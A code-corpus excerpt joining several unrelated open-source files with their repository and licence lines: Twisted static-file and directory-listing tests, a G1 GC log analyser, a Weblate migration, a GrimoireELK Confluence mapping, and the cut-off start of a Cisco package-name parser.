"""
A single bytes range without an explicit start position is parsed into
a two-tuple of C{None} and the end position.
"""
self.assertEqual(
self.resource._parseRangeHeader('bytes=-3'), [(None, 3)])
def test_range(self):
"""
A single bytes range with explicit start and stop positions is parsed
into a two-tuple of those positions.
"""
self.assertEqual(
self.resource._parseRangeHeader('bytes=2-5'), [(2, 5)])
def test_rangeWithSpace(self):
"""
A single bytes range with whitespace in allowed places is parsed in
the same way as it would be without the whitespace.
"""
self.assertEqual(
self.resource._parseRangeHeader(' bytes=1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader('bytes =1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader('bytes= 1-2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader('bytes=1 -2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader('bytes=1- 2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader('bytes=1-2 '), [(1, 2)])
def test_nullRangeElements(self):
"""
If there are multiple byte ranges but only one is non-null, the
non-null range is parsed and its start and stop returned.
"""
self.assertEqual(
self.resource._parseRangeHeader('bytes=1-2,\r\n, ,\t'), [(1, 2)])
def test_multipleRanges(self):
"""
If multiple byte ranges are specified their starts and stops are
returned.
"""
self.assertEqual(
self.resource._parseRangeHeader('bytes=1-2,3-4'),
[(1, 2), (3, 4)])
def test_bodyLength(self):
"""
A correct response to a range request is as long as the length of the
requested range.
"""
self.request.headers['range'] = 'bytes=0-43'
self.resource.render(self.request)
self.assertEqual(len(''.join(self.request.written)), 44)
def test_invalidRangeRequest(self):
"""
An incorrect range request (RFC 2616 defines a correct range request as
a Bytes-Unit followed by a '=' character followed by a specific range.
Only 'bytes' is defined) results in the range header value being logged
and a normal 200 response being sent.
"""
self.request.headers['range'] = range = 'foobar=0-43'
self.resource.render(self.request)
expected = "Ignoring malformed Range header %r" % (range,)
self._assertLogged(expected)
self.assertEqual(''.join(self.request.written), self.payload)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(
self.request.outgoingHeaders['content-length'],
str(len(self.payload)))
def parseMultipartBody(self, body, boundary):
"""
Parse C{body} as a multipart MIME response separated by C{boundary}.
        Note that this will fail the calling test on certain syntactic
problems.
"""
sep = "\r\n--" + boundary
parts = ''.join(body).split(sep)
self.assertEqual('', parts[0])
self.assertEqual('--\r\n', parts[-1])
parsed_parts = []
for part in parts[1:-1]:
before, header1, header2, blank, partBody = part.split('\r\n', 4)
headers = header1 + '\n' + header2
self.assertEqual('', before)
self.assertEqual('', blank)
partContentTypeValue = re.search(
'^content-type: (.*)$', headers, re.I|re.M).group(1)
start, end, size = re.search(
'^content-range: bytes ([0-9]+)-([0-9]+)/([0-9]+)$',
headers, re.I|re.M).groups()
parsed_parts.append(
{'contentType': partContentTypeValue,
'contentRange': (start, end, size),
'body': partBody})
return parsed_parts
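    # For reference, a multipart/byteranges body (RFC 2616, appendix 19.2)
    # looks roughly like the following, one part per satisfied range (the
    # boundary string and the range values here are illustrative):
    #
    #   --BOUNDARY\r\n
    #   Content-Type: text/plain\r\n
    #   Content-Range: bytes 0-2/64\r\n
    #   \r\n
    #   <3 bytes of body>\r\n
    #   --BOUNDARY--\r\n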
def test_multipleRangeRequest(self):
"""
        The response to a request for multiple byte ranges is a MIME-ish
multipart response.
"""
startEnds = [(0, 2), (20, 30), (40, 50)]
rangeHeaderValue = ','.join(["%s-%s"%(s,e) for (s, e) in startEnds])
self.request.headers['range'] = 'bytes=' + rangeHeaderValue
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
'^multipart/byteranges; boundary="(.*)"$',
self.request.outgoingHeaders['content-type']).group(1)
parts = self.parseMultipartBody(''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(self.resource.type, part['contentType'])
start, end, size = part['contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), e)
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part['body'])
def test_multipleRangeRequestWithRangeOverlappingEnd(self):
"""
        The response to a request for multiple byte ranges is a MIME-ish
        multipart response, even when one of the ranges falls off the end of
the resource.
"""
startEnds = [(0, 2), (40, len(self.payload) + 10)]
rangeHeaderValue = ','.join(["%s-%s"%(s,e) for (s, e) in startEnds])
self.request.headers['range'] = 'bytes=' + rangeHeaderValue
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
'^multipart/byteranges; boundary="(.*)"$',
self.request.outgoingHeaders['content-type']).group(1)
parts = self.parseMultipartBody(''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(self.resource.type, part['contentType'])
start, end, size = part['contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), min(e, self.resource.getFileSize()-1))
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part['body'])
def test_implicitEnd(self):
"""
        If the end byte position is omitted, the range is treated as
        extending to the last byte of the resource.
"""
self.request.headers['range'] = 'bytes=23-'
self.resource.render(self.request)
self.assertEqual(''.join(self.request.written), self.payload[23:])
self.assertEqual(len(''.join(self.request.written)), 41)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.outgoingHeaders['content-range'], 'bytes 23-63/64')
self.assertEqual(self.request.outgoingHeaders['content-length'], '41')
def test_implicitStart(self):
"""
If the start byte position is omitted but the end byte position is
supplied, then the range is treated as requesting the last -N bytes of
the resource, where N is the end byte position.
"""
self.request.headers['range'] = 'bytes=-17'
self.resource.render(self.request)
self.assertEqual(''.join(self.request.written), self.payload[-17:])
self.assertEqual(len(''.join(self.request.written)), 17)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.outgoingHeaders['content-range'], 'bytes 47-63/64')
self.assertEqual(self.request.outgoingHeaders['content-length'], '17')
def test_explicitRange(self):
"""
A correct response to a bytes range header request from A to B starts
with the A'th byte and ends with (including) the B'th byte. The first
byte of a page is numbered with 0.
"""
self.request.headers['range'] = 'bytes=3-43'
self.resource.render(self.request)
written = ''.join(self.request.written)
self.assertEqual(written, self.payload[3:44])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.outgoingHeaders['content-range'], 'bytes 3-43/64')
self.assertEqual(
str(len(written)), self.request.outgoingHeaders['content-length'])
def test_explicitRangeOverlappingEnd(self):
"""
A correct response to a bytes range header request from A to B when B
is past the end of the resource starts with the A'th byte and ends
with the last byte of the resource. The first byte of a page is
numbered with 0.
"""
self.request.headers['range'] = 'bytes=40-100'
self.resource.render(self.request)
written = ''.join(self.request.written)
self.assertEqual(written, self.payload[40:])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.outgoingHeaders['content-range'], 'bytes 40-63/64')
self.assertEqual(
str(len(written)), self.request.outgoingHeaders['content-length'])
def test_statusCodeRequestedRangeNotSatisfiable(self):
"""
If a range is syntactically invalid due to the start being greater than
the end, the range header is ignored (the request is responded to as if
it were not present).
"""
self.request.headers['range'] = 'bytes=20-13'
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(''.join(self.request.written), self.payload)
self.assertEqual(
self.request.outgoingHeaders['content-length'],
str(len(self.payload)))
def test_invalidStartBytePos(self):
"""
If a range is unsatisfiable due to the start not being less than the
length of the resource, the response is 416 (Requested range not
satisfiable) and no data is written to the response body (RFC 2616,
section 14.35.1).
"""
self.request.headers['range'] = 'bytes=67-108'
self.resource.render(self.request)
self.assertEqual(
self.request.responseCode, http.REQUESTED_RANGE_NOT_SATISFIABLE)
self.assertEqual(''.join(self.request.written), '')
self.assertEqual(self.request.outgoingHeaders['content-length'], '0')
# Sections 10.4.17 and 14.16
self.assertEqual(
self.request.outgoingHeaders['content-range'],
'bytes */%d' % (len(self.payload),))
class DirectoryListerTest(TestCase):
"""
Tests for L{static.DirectoryLister}.
"""
def _request(self, uri):
request = DummyRequest([''])
request.uri = uri
return request
def test_renderHeader(self):
"""
        L{static.DirectoryLister} prints the request uri as the header of the
        rendered content.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request('foo'))
self.assertIn("<h1>Directory listing for foo</h1>", data)
self.assertIn("<title>Directory listing for foo</title>", data)
def test_renderUnquoteHeader(self):
"""
        L{static.DirectoryLister} unquotes the request uri before printing it.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request('foo%20bar'))
self.assertIn("<h1>Directory listing for foo bar</h1>", data)
self.assertIn("<title>Directory listing for foo bar</title>", data)
def test_escapeHeader(self):
"""
        L{static.DirectoryLister} escapes "&", "<" and ">" after unquoting the
        request uri.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request('foo%26bar'))
self.assertIn("<h1>Directory listing for foo&bar</h1>", data)
self.assertIn("<title>Directory listing for foo&bar</title>", data)
def test_renderFiles(self):
"""
L{static.DirectoryLister} is able to list all the files inside a
directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1').setContent("content1")
path.child('file2').setContent("content2" * 1000)
lister = static.DirectoryLister(path.path)
data = lister.render(self._request('foo'))
body = """<tr class="odd">
<td><a href="file1">file1</a></td>
<td>8B</td>
<td>[text/html]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="file2">file2</a></td>
<td>7K</td>
<td>[text/html]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderDirectories(self):
"""
L{static.DirectoryLister} is able to list all the directories inside
a directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2 & 3').makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request('foo'))
body = """<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir2%20%26%203/">dir2 & 3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderFiltered(self):
"""
        L{static.DirectoryLister} takes an optional C{dirs} argument that
        filters the list of directories and files printed.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2').makedirs()
path.child('dir3').makedirs()
lister = static.DirectoryLister(path.path, dirs=["dir1", "dir3"])
data = lister.render(self._request('foo'))
body = """<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir3/">dir3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_oddAndEven(self):
"""
        L{static.DirectoryLister} gives alternating "odd" and "even" classes
        to the rows in the table.
"""
lister = static.DirectoryLister(None)
elements = [{"href": "", "text": "", "size": "", "type": "",
"encoding": ""} for i in xrange(5)]
content = lister._buildTableContent(elements)
self.assertEqual(len(content), 5)
self.assertTrue(content[0].startswith('<tr class="odd">'))
self.assertTrue(content[1].startswith('<tr class="even">'))
self.assertTrue(content[2].startswith('<tr class="odd">'))
self.assertTrue(content[3].startswith('<tr class="even">'))
self.assertTrue(content[4].startswith('<tr class="odd">'))
def test_contentType(self):
"""
L{static.DirectoryLister} produces a MIME-type that indicates that it is
HTML, and includes its charset (UTF-8).
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
req = self._request('')
lister.render(req)
self.assertEqual(req.outgoingHeaders['content-type'],
"text/html; charset=utf-8")
def test_mimeTypeAndEncodings(self):
"""
L{static.DirectoryLister} is able to detect mimetype and encoding of
listed files.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1.txt').setContent("file1")
path.child('file2.py').setContent("python")
path.child('file3.conf.gz').setContent("conf compressed")
path.child('file4.diff.bz2').setContent("diff compressed")
directory = os.listdir(path.path)
directory.sort()
contentTypes = {
".txt": "text/plain",
".py": "text/python",
".conf": "text/configuration",
".diff": "text/diff"
}
lister = static.DirectoryLister(path.path, contentTypes=contentTypes)
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [
{'encoding': '',
'href': 'file1.txt',
'size': '5B',
'text': 'file1.txt',
'type': '[text/plain]'},
{'encoding': '',
'href': 'file2.py',
'size': '6B',
'text': 'file2.py',
'type': '[text/python]'},
{'encoding': '[gzip]',
'href': 'file3.conf.gz',
'size': '15B',
'text': 'file3.conf.gz',
'type': '[text/configuration]'},
{'encoding': '[bzip2]',
'href': 'file4.diff.bz2',
'size': '15B',
'text': 'file4.diff.bz2',
'type': '[text/diff]'}])
def test_brokenSymlink(self):
"""
        If one of the files in the listing is a broken symlink, it should not
        be returned by L{static.DirectoryLister._getFilesAndDirectories}.
"""
path = FilePath(self.mktemp())
path.makedirs()
file1 = path.child('file1')
file1.setContent("file1")
file1.linkTo(path.child("file2"))
file1.remove()
lister = static.DirectoryLister(path.path)
directory = os.listdir(path.path)
directory.sort()
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [])
if getattr(os, "symlink", None) is None:
test_brokenSymlink.skip = "No symlink support"
def test_childrenNotFound(self):
"""
Any child resource of L{static.DirectoryLister} renders an HTTP
I{NOT FOUND} response code.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
request = self._request('')
child = resource.getChildForRequest(lister, request)
result = _render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, http.NOT_FOUND)
result.addCallback(cbRendered)
return result
def test_repr(self):
"""
L{static.DirectoryLister.__repr__} gives the path of the lister.
"""
path = FilePath(self.mktemp())
lister = static.DirectoryLister(path.path)
self.assertEqual(repr(lister),
"<DirectoryLister of %r>" % (path.path,))
self.assertEqual(str(lister),
"<DirectoryLister of %r>" % (path.path,))
def test_formatFileSize(self):
"""
        L{static.formatFileSize} formats a number of bytes into a more
        readable string.
"""
self.assertEqual(static.formatFileSize(0), "0B")
self.assertEqual(static.formatFileSize(123), "123B")
self.assertEqual(static.formatFileSize(4567), "4K")
self.assertEqual(static.formatFileSize(8900000), "8M")
self.assertEqual(static.formatFileSize(1234000000), "1G")
self.assertEqual(static.formatFileSize(1234567890000), "1149G")
class LoadMimeTypesTests(TestCase):
"""
Tests for the MIME type loading routine.
@cvar UNSET: A sentinel to signify that C{self.paths} has not been set by
the mock init.
"""
UNSET = object()
def setUp(self):
self.paths = self.UNSET
def _fakeInit(self, paths):
"""
A mock L{mimetypes.init} that records the value of the passed C{paths}
argument.
@param paths: The paths that will be recorded.
"""
self.paths = paths
def test_defaultArgumentIsNone(self):
"""
By default, C{None} is passed to C{mimetypes.init}.
"""
static.loadMimeTypes(init=self._fakeInit)
self.assertIdentical(self.paths, None)
def test_extraLocationsWork(self):
"""
Passed MIME type files are passed to C{mimetypes.init}.
"""
paths = ["x", "y", "z"]
static.loadMimeTypes(paths, init=self._fakeInit)
self.assertIdentical(self.paths, paths)
def test_usesGlobalInitFunction(self):
"""
By default, C{mimetypes.init} is called.
"""
# Checking mimetypes.inited doesn't always work, because
# something, somewhere, calls mimetypes.init. Yay global
# mutable state :)
args, _, _, defaults = inspect.getargspec(static.loadMimeTypes)
defaultInit = defaults[args.index("init")]
self.assertIdentical(defaultInit, mimetypes.init)
| bsd-3-clause |
lichengwu/python_tools | utils/cn/lichengwu/utils/utils/gc/G1LogUtil.py | 1 | 7950 | # coding=utf-8
__author__ = 'lichengwu'
import datetime
import re
'''
Garbage First (G1) Log Analysis Util
'''
class G1LogUtil:
__path = ''
# some regular expression pattern
# like this '2012-12-19T10:25:19'
__START_LINE_PATTERN = re.compile('^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:.*pause.*')
# like this '112M(112M)->0B(112M)'
__MEMORY_INFO_PATTERN = re.compile('(\d+)([M|B|K|G])\((\d+)([M|B|K|G])\)->(\d+)([M|B|K|G])\((\d+)([M|B|K|G])\)')
# like this '16M->16M'
__SIMPLE_MEMORY_INFO_PATTERN = re.compile('(\d+)([M|B|K|G])->(\d+)([M|B|K|G])')
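    # A pause header line this parser expects looks roughly like the
    # following (an illustrative sample, not taken from a real log; after
    # splitting on spaces, token[4] carries the GC type and token[5] the
    # pause seconds):
    #   2012-12-19T10:25:19.123+0800: 1.234: [GC pause (young), 0.0123456 secs]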
# constructor
def __init__(self, path):
self.__path = path
"""
analyse G1 log for java
"""
def analyse(self):
# get log reader
reader = self.__reader(self.__path)
# number of GC times
gc_count = 0
gc_count_young = 0
gc_count_mixed = 0
# total stop the world time
total_stop_time = 0.000000
# max heap size
max_heap_size = 0
# min heap size
min_heap_size = 0xEFFFFFFFFFFFFFFFF
# max eden size
max_eden_size = 0
# min eden size
min_eden_size = 0xEFFFFFFFFFFFFFFFF
# survivor size
survivor_size = None
# total eden size for statistics
total_eden_size = 0
# map store memory info
memory_usage_map = {'young_garbage_percent': [], 'heap_garbage_percent': [], 'young_usage_percent': [],
'heap_usage_percent': []}
#log start time
start_time = None
# log end time
finish_time = None
# gc work thread count
gc_work_thread_number = None
each_line = reader.next()
while each_line:
if self.__is_start_line(each_line):
token = each_line.split(' ')
if 'initial-mark' in each_line:
total_stop_time += float(token[6])
else:
total_stop_time += float(token[5])
if start_time is None:
start_time = self.__get_datetime(token[0])
finish_time = token[0]
gc_count += 1
gc_type = token[4][1:-2]
if gc_type == 'young':
gc_count_young += 1
elif gc_type == 'mixed':
gc_count_mixed += 1
elif each_line.find(' [Eden:') == 0:
'''
parse memory info
'''
memory_info = each_line.split(' ')
eden_info = self.__parse_memory_info(memory_info[4])
survivor_info = self.__parse_memory_info(memory_info[6])
if survivor_size is None:
survivor_size = survivor_info[1]
heap_info = self.__parse_memory_info(memory_info[8])
max_heap_size = max(max_heap_size, heap_info[1])
min_heap_size = min(heap_info[1], min_heap_size)
# garbage (heap) / before gc (heap)
memory_usage_map['heap_garbage_percent'].append(float(heap_info[0] - heap_info[2]) / heap_info[0])
# before gc (heap) / heap size
memory_usage_map['heap_usage_percent'].append(float(heap_info[0]) / heap_info[1])
max_eden_size = max(max_eden_size, eden_info[1])
min_eden_size = min(eden_info[1], min_eden_size)
# garbage (eden+survivor) / before gc (eden+survivor)
memory_usage_map['young_garbage_percent'].append(
float(eden_info[0] + survivor_info[0] - eden_info[2] - survivor_info[1]) / (
eden_info[0] + survivor_info[0]))
# before gc(eden+survivor) / eden+survivor*2
memory_usage_map['young_usage_percent'].append(
float(eden_info[0] + survivor_info[0]) / (eden_info[1] + survivor_info[1] * 2))
total_eden_size += eden_info[1]
elif gc_work_thread_number is None and each_line.find(' [GC Worker Start') == 0:
gc_work_thread_number = len(each_line.strip().split(' ')) - 1
each_line = reader.next()
finish_time = self.__get_datetime(finish_time)
reader.close()
print '''G1 log Time:
[%s] - [%s]''' % (
start_time.strftime('%Y-%m-%d %H:%M:%S'), finish_time.strftime('%Y-%m-%d %H:%M:%S'))
summary = '''Memory Info:
Min Heap Size\t= %sM
Max Heap Size\t= %sM
Min Eden Size\t= %sM
Max Eden Size\t= %sM
Avg Eden Size\t= %sM
Survivor Size\t= %sM''' % (
        (min_heap_size / 1024), (max_heap_size / 1024), (min_eden_size / 1024), (max_eden_size / 1024),
(total_eden_size / gc_count / 1024), survivor_size / 1024)
print summary
gc_info = '''GC Info:
GC Work Threads\t= %s
Avg Stop Time\t= %.2fms
GC Throughput\t= %.2f%%
''' % (gc_work_thread_number, (total_stop_time * 1000 / gc_count),
total_stop_time * 100 / (finish_time - start_time).total_seconds())
        gc_info += '''GC(young) Times\t= %s
GC(mixed) Times\t= %s
Total GC Times\t= %s
''' % (gc_count_young, gc_count_mixed, gc_count)
        gc_info += '''Avg Young Generation Garbage Rate\t= %.2f%%
Avg Heap Garbage Rate\t= %.2f%%
''' % (sum(memory_usage_map['young_garbage_percent']) * 100 / len(memory_usage_map['young_garbage_percent']),
sum(memory_usage_map['heap_garbage_percent']) * 100 / len(memory_usage_map['heap_garbage_percent']))
        gc_info += '''Avg Max Young Generation Usage Rate\t= %.2f%%
Avg Max Heap Usage Rate\t= %.2f%%
        ''' % (sum(memory_usage_map['young_usage_percent']) * 100 / len(memory_usage_map['young_usage_percent']),
sum(memory_usage_map['heap_usage_percent']) * 100 / len(memory_usage_map['heap_usage_percent']))
print gc_info
# get datetime from header line
def __get_datetime(self, str):
# time like this '2012-12-12T19:01:28.610'
datetime_string = str
if len(str) > 23:
datetime_string = str[0:23]
return datetime.datetime.strptime(datetime_string, '%Y-%m-%dT%H:%M:%S.%f')
# test if the line is g1 log start line
def __is_start_line(self, line):
#pattern = re.compile('^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:')
return self.__START_LINE_PATTERN.match(line) is not None
# private reader for read each line
def __reader(self, path):
log_file = open(path, 'r')
line = log_file.readline()
while line:
yield line
line = log_file.readline()
log_file.close()
yield None
'''
    parse memory info to a tuple in kilobytes
    eg: 1M->1M parse to (1024,1024)
    2M(2M)->0B(1M) parse to (2048,2048,0,1024)
'''
def __parse_memory_info(self, info):
match = self.__MEMORY_INFO_PATTERN.match(info)
if match:
cell = match.groups()
return int(cell[0]) * self.__unit2kb(cell[1]), int(cell[2]) * self.__unit2kb(cell[3]), int(
cell[4]) * self.__unit2kb(cell[5]), int(cell[6]) * self.__unit2kb(cell[7])
match = self.__SIMPLE_MEMORY_INFO_PATTERN.match(info)
if match:
cell = match.groups()
return int(cell[0]) * self.__unit2kb(cell[1]), int(cell[2]) * self.__unit2kb(cell[3])
return None
# covert unit to KB
# M = 1024K
    # G = 1024M = 1024*1024K
def __unit2kb(self, unit):
if unit == 'M':
return 1024
elif unit == 'K':
return 1
elif unit == "G":
return 1048576
else:
return 1
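# Illustrative conversions performed by __parse_memory_info (values in KB,
# per the docstring above):
#
#   '112M(112M)->0B(112M)'  ->  (114688, 114688, 0, 114688)
#   '16M->16M'              ->  (16384, 16384)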
if __name__ == '__main__':
analyseG1Log = G1LogUtil('/home/zuojing/tmp/atw/gc.log')
analyseG1Log.analyse()
| apache-2.0 |
lem9/weblate | weblate/trans/migrations/0022_auto_20150309_0932.py | 15 | 1055 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('trans', '0021_auto_20150306_1605'),
]
operations = [
migrations.AlterField(
model_name='subproject',
name='file_format',
field=models.CharField(default=b'auto', help_text='Automatic detection might fail for some formats and is slightly slower.', max_length=50, verbose_name='File format', choices=[(b'aresource', 'Android String Resource'), (b'auto', 'Automatic detection'), (b'json', 'JSON file'), (b'php', 'PHP strings'), (b'po', 'Gettext PO file'), (b'po-mono', 'Gettext PO file (monolingual)'), (b'properties', 'Java Properties'), (b'properties-utf8', 'Java Properties (UTF-8)'), (b'resx', '.Net resource file'), (b'strings', 'OS X Strings'), (b'strings-utf8', 'OS X Strings (UTF-8)'), (b'ts', 'Qt Linguist Translation File'), (b'xliff', 'XLIFF Translation File')]),
preserve_default=True,
),
]
| gpl-3.0 |
grimoirelab/GrimoireELK | grimoire_elk/raw/confluence.py | 1 | 2288 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2019 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Alvaro del Castillo San Felix <[email protected]>
#
from .elastic import ElasticOcean
from ..elastic_mapping import Mapping as BaseMapping
class Mapping(BaseMapping):
@staticmethod
def get_elastic_mappings(es_major):
"""Get Elasticsearch mapping.
Non dynamic discovery of type for:
* data.extensions
:param es_major: major version of Elasticsearch, as string
:returns: dictionary with a key, 'items', with the mapping
"""
mapping = '''
{
"dynamic":true,
"properties": {
"data": {
"properties": {
"extensions": {
"dynamic":false,
"properties": {}
},
"ancestors": {
"properties": {
"extensions": {
"dynamic":false,
"properties": {}
}
}
},
"body": {
"dynamic":false,
"properties": {}
}
}
}
}
}
'''
return {"items": mapping}
class ConfluenceOcean(ElasticOcean):
"""Confluence Ocean feeder"""
mapping = Mapping
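# Usage sketch (caller code is assumed, not part of this module): fetch the
# Elasticsearch mapping for the items of this backend, e.g.
#
#   es_mapping = ConfluenceOcean.mapping.get_elastic_mappings(es_major='6')['items']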
| gpl-3.0 |
kstaniek/csm | csmserver/horizon/package_lib.py | 1 | 18303 | # =============================================================================
#
# Copyright (c) 2013, Cisco Systems
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
# =============================================================================
import os
import re
PIE = "pie"
ACTIVE = "active"
INACTIVE = "inactive"
COMMITTED = "committed"
ACTIVE_STR = "Active Packages:"
INACTIVE_STR = "Inactive Packages:"
pkg_name = "asr9k-mgbl-px.pie-4.2.3"
nn = "disk0:asr9k-mini-px-4.2.3"
class PackageClass(object):
def __init__(self, org_package=""):
# Platform or domain
self.platform = None
# Package name
self.pkg = None
# Architecture
self.arch = None
# Release version
self.version = None
self.subversion = None
# Package format
self.format = None
# Patch/maintenance version
self.patch_ver = None
# Requires or depends on
self.requires = None
# Supersedes or overrides
self.supersedes = None
# Partition where package exists
self.partition = None
self.org_package = org_package
def __str__(self):
# FIXME: This is a hack. It needs to be recreate back string from attributes
return self.org_package.replace(".SIT_IMAGE", "", 1)
__repr__ = __str__
class NewPackage():
def __init__(self, pkg_lst_file=None):
self.inputfile = pkg_lst_file
self.pkg_named_list = get_pkgs(pkg_lst_file)
self.pkg_list = []
if self.pkg_named_list:
self._update_pkgs()
def _update_pkgs(self):
for pkg_name in self.pkg_named_list:
# Validate the package name
pkg = self.validate_offbox_xrpie_pkg(pkg_name)
if pkg:
self.pkg_list.append(pkg)
def validate_offbox_xrpie_pkg(self, pkg):
# asr9k-px-4.3.2.CSCuj61599.pie
# asr9k-mpls-px.pie-4.3.2
# asr9k-asr9000v-nV-px.pie-5.2.2
# asr9k-mcast-px.pie-5.2.2
# asr9k-asr901-nV-px.pie-5.2.2
# asr9k-mgbl-px.pie-5.2.2
# asr9k-asr903-nV-px.pie-5.2.2
#self.error("package 1",pkg)
pkg_expr_2pkg = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_2pkg_eng1 = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+\..*)\..*')
pkg_expr_2pkg_inac = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_2pkg_inac_eng = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)-(?P<ARCH>p\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
pkg_expr_2pkg_inac_noarch = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_2pkg_inac_noarch_eng = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<SUBPKGNAME>\w+)(?P<PKGFORMAT>-)(?P<VERSION>\d+\.\d+\.\d+\.\d+\w+)')
pkg_expr = re.compile(
r'(?P<PLATFORM>\w+)-(?P<PKGNAME>\w+)-(?P<ARCH>p\w+)\.(?P<PKGFORMAT>\w+)-(?P<VERSION>\d+\.\d+\.\d+)')
pkg_expr_eng = re.compile(
